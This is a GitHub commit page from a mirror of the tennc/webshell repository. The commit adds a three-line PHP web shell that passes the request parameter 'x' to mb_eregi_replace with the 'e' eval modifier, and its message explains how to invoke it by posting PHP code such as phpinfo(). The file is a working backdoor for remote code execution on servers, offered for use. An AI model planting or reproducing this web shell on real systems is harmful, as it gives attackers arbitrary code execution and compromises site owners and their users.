1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00

Create 2020.08.20.15.php

use:
shell.php?e=mb_eregi_replace
post x=phpinfo();
This commit is contained in:
tennc
2020-08-20 12:48:04 +08:00
committed by GitHub
parent 6a9169da6b
commit ecc1fb09ee

3
php/2020.08.20.15.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
?>